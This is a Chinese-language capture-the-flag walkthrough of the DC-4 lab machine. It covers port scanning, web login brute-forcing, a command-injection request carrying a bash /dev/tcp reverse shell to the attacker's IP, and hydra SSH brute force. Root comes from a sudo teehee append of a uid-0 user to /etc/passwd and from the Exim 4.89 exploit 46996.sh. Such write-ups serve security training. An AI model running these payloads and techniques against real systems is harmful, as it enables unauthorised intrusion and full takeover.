DC4 靶机记录 nmap查看信息 sudo nmap -p- -sS -A -sV -vv ip
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp6/VowbK8MWfMDQsxHRV2yvL8ZO+FEkyIBPnDwTVKkJiVKaJMZ5ztAwTnkc30c3tvC/yCqDAJ5IbHzgvR3kHKS37d17K+/OLxalDutFjrWjG7mBxhMW/0gnrCqJokZBDXDuvHQonajsfSN6FmWoP0PDsfL8NQXwWIoMvTRYHtiEQqczV5CYZZtMKuOyiLCiWINUqKMwY+PTb0M9RzSGYSJvN8sZZnvIw/xU7xBCmaWuq8h2dIfsxy+FhrwZMhvhJOpBYtwZB+hos3bbV5FKHhVztxEo+Y2vyKTl6MXJ4qwCChJdaBAip/aUt1zDoF3cIb+yebteyDk8KIqmp5Ju4r | 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIbZ4PXPXShXCcbe25IY3SYbzB4hxP4K2BliUGtuYSABZosGlLlL1Pi214yCLs3ORpGxsRIHv8R0KFQX+5SNSog= | 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDcvQZ2DbLqSSOzIbIXhyrDJ15duVKd9TEtxfX35ubsM 80/tcp open http syn-ack ttl 64 nginx 1.15.10 |_http-title: System Tools | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: nginx/1.15.10
访问80端口 index.php为登录页面
尝试扫描目录没有收获
尝试爆破口令
获取到用户名密码 admin happy
发现command.php存在RCE 为了方便尝试反弹shell
payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /command.php HTTP/1.1 Host: 172.16.40.99 Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.16.40.99 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.40.99/command.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=e93bqfedkkqs9resg42gcf1473 Connection: close radio=bash+-c+'exec+bash+-i+%26>/dev/tcp/172.16.40.97/20000+<%261'&submit=Run
攻击机端监听端口 nc -lvvp 20000
成功连接 1 2 3 4 5 6 7 8 9 10 11 12 13 listening on [any] 20000 ... 172.16.40.99: inverse host lookup failed: Unknown host connect to [172.16.40.97] from (UNKNOWN) [172.16.40.99] 43194 bash: cannot set terminal process group (453): Inappropriate ioctl for device bash: no job control in this shell www-data@dc-4:/usr/share/nginx/html$ www-data@dc-4:/usr/share/nginx/html$ python -c 'import pty; pty.spawn("/bin/bash")' <tml$ python -c 'import pty; pty.spawn("/bin/bash")' www-data@dc-4:/usr/share/nginx/html$ ls ls command.php css images index.php login.php logout.php
查看当前权限 1 2 www-data@dc-4:/usr/share/nginx/html$ whoami www-data
使用ls查看当前目录信息 1 2 www-data@dc-4:/usr/share/nginx/html$ ls command.php css images index.php login.php logout.php
访问passwd文件发现存在多个用户 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false messagebus:x:105:109::/var/run/dbus:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash Debian-exim:x:108:112::/var/spool/exim4:/bin/false
进入home目录发现存在3个用户 1 2 www-data@dc-4:/home$ ls charles jim sam
分别进入3个用户目录发现仅jim中存在文件 1 2 www-data@dc-4:/home/jim$ ls backups mbox test.sh
进入backups 发现存在密码备份文件 1 2 www-data@dc-4:/home/jim/backups$ ls old-passwords.bak
尝试使用获取到的文件进行ssh爆破 hydra -l jim -P old-passwords.bak ssh://172.16.40.99
成功爆破到密码 [22][ssh] host: 172.16.40.99 login: jim password: jibril04
使用jim登录到系统 通过查找找到Charles的密码^xHhA&hvim0y
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 jim@dc-4:~$ cd /var/mail/ jim@dc-4:/var/mail$ ls jim jim@dc-4:/var/mail$ cat jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local (Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000 To: jim@dc-4 Subject: Holidays MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCjIX-0000kO-Qt@dc-4> From: Charles <charles@dc-4> Date: Sat, 06 Apr 2019 21:15:45 +1000 Status: O Hi Jim, I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya, Charles
登录Charles用户 使用sudo -l发现teehee拥有root权限
1 2 3 4 5 6 charles@dc-4:~$ sudo -l Matching Defaults entries for charles on dc-4: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User charles may run the following commands on dc-4: (root) NOPASSWD: /usr/bin/teehee
尝试提权1(teehee提权) 1 2 3 4 5 6 7 teehee提权 teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目 echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd 按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限
teehee成功提权获得root权限 1 2 3 4 5 6 charles@dc-4:~$ echo "superman01::0:0:::/bin/bash" | sudo teehee -a /etc/passwd superman01::0:0:::/bin/bash charles@dc-4:~$ su superman01 bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) root@dc-4:/home/charles# whoami root
尝试提权2(exim4提权) 在jim用户下尝试使用SUID提权发现存在exim4,且版本为4.89
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jim@dc-4:/var/mail$ find / -user root -perm /4000 2>/dev/null /usr/bin/gpasswd /usr/bin/chfn /usr/bin/sudo /usr/bin/chsh /usr/bin/newgrp /usr/bin/passwd /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/exim4 /bin/mount /bin/umount /bin/su /bin/ping
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jim@dc-4:/usr/lib/exim4$ ./exim4 --version Exim version 4.89 #2 built 10-Feb-2018 08:26:05 Copyright (c) University of Cambridge, 1995 - 2017 (c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017 Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013) Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd Authenticators: cram_md5 plaintext Routers: accept dnslookup ipliteral manualroute queryprogram redirect Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp Fixed never_users: 0 Configure owner: 0:0 Size of off_t: 8 Configuration file is /var/lib/exim4/config.autogenerated
使用kali搜索exim,发现存在以下可利用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 exim -------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------- --------------------------------- Dovecot with Exim - 'sender_address' Remote Command Execution | linux/remote/25297.txt Exim 3.x - Format String | linux/local/20900.txt Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | linux/local/756.c Exim 4.41 - 'dns_build_reverse' Local Read Emails | linux/local/1009.c Exim 4.42 - Local Privilege Escalation | linux/local/796.sh Exim 4.43 - 'auth_spa_server()' Remote | linux/remote/812.c Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | linux/remote/16925.rb Exim 4.63 - Remote Command Execution | linux/remote/15725.pl Exim 4.84-3 - Local Privilege Escalation | linux/local/39535.sh Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb Exim 4.87 < 4.91 - (Local / Remote) Command Execution | linux/remote/46974.txt Exim 4.89 - 'BDAT' Denial of Service | multiple/dos/43184.txt Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py exim 4.90 - Remote Code Execution | linux/remote/45671.py Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c Exim Buffer 1.6.2/1.6.51 - Local Overflow | unix/local/20333.c Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | linux/dos/35951.py Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | linux/remote/36421.rb Exim Internet Mailer 3.35/3.36/4.10 - Format String | linux/local/22066.c Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | linux/local/39702.rb Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | linux/remote/24093.c Exim - 'sender_address' Remote Code Execution | linux/remote/25970.py PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py -------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
通过尝试46996.sh可用 使用scp将payload上传到靶机
scp 46996.sh jim@172.16.40.99:/home/jim
成功提权 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 jim@dc-4:~$ ./46996.sh /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> Preparing setuid shell helper... Delivering setuid payload... 220 dc-4 ESMTP Exim 4.89 Tue, 13 Sep 2022 17:26:04 +1000 250 dc-4 Hello localhost [::1] 250 OK 250 Accepted 354 Enter message, ending with "." on a line by itself 250 OK id=1oY0J2-0000EC-7b 221 dc-4 closing connection Waiting 5 seconds... -rwsr-xr-x 1 root jim 7500 Sep 13 17:26 /tmp/pwned # whoami root
查找flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 root@dc-4:/home/charles# find / -name "*flag*.txt" /root/flag.txt root@dc-4:/home/charles# cat /root/flag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.
Sum-up 扫描端口发现80,22
通过爆破获取web用户名密码
Commond页面存在RCE->反弹shell
/home/jim 下存在jim的passwd备份文件->hydra爆破->登录到jim
1)通过mail找到Charles的密码->登录到Charles->sudo -l->teehee编辑器提权
2)通过查找可用SUID提权方式->exim4提权
find(root权限)查找flag文件
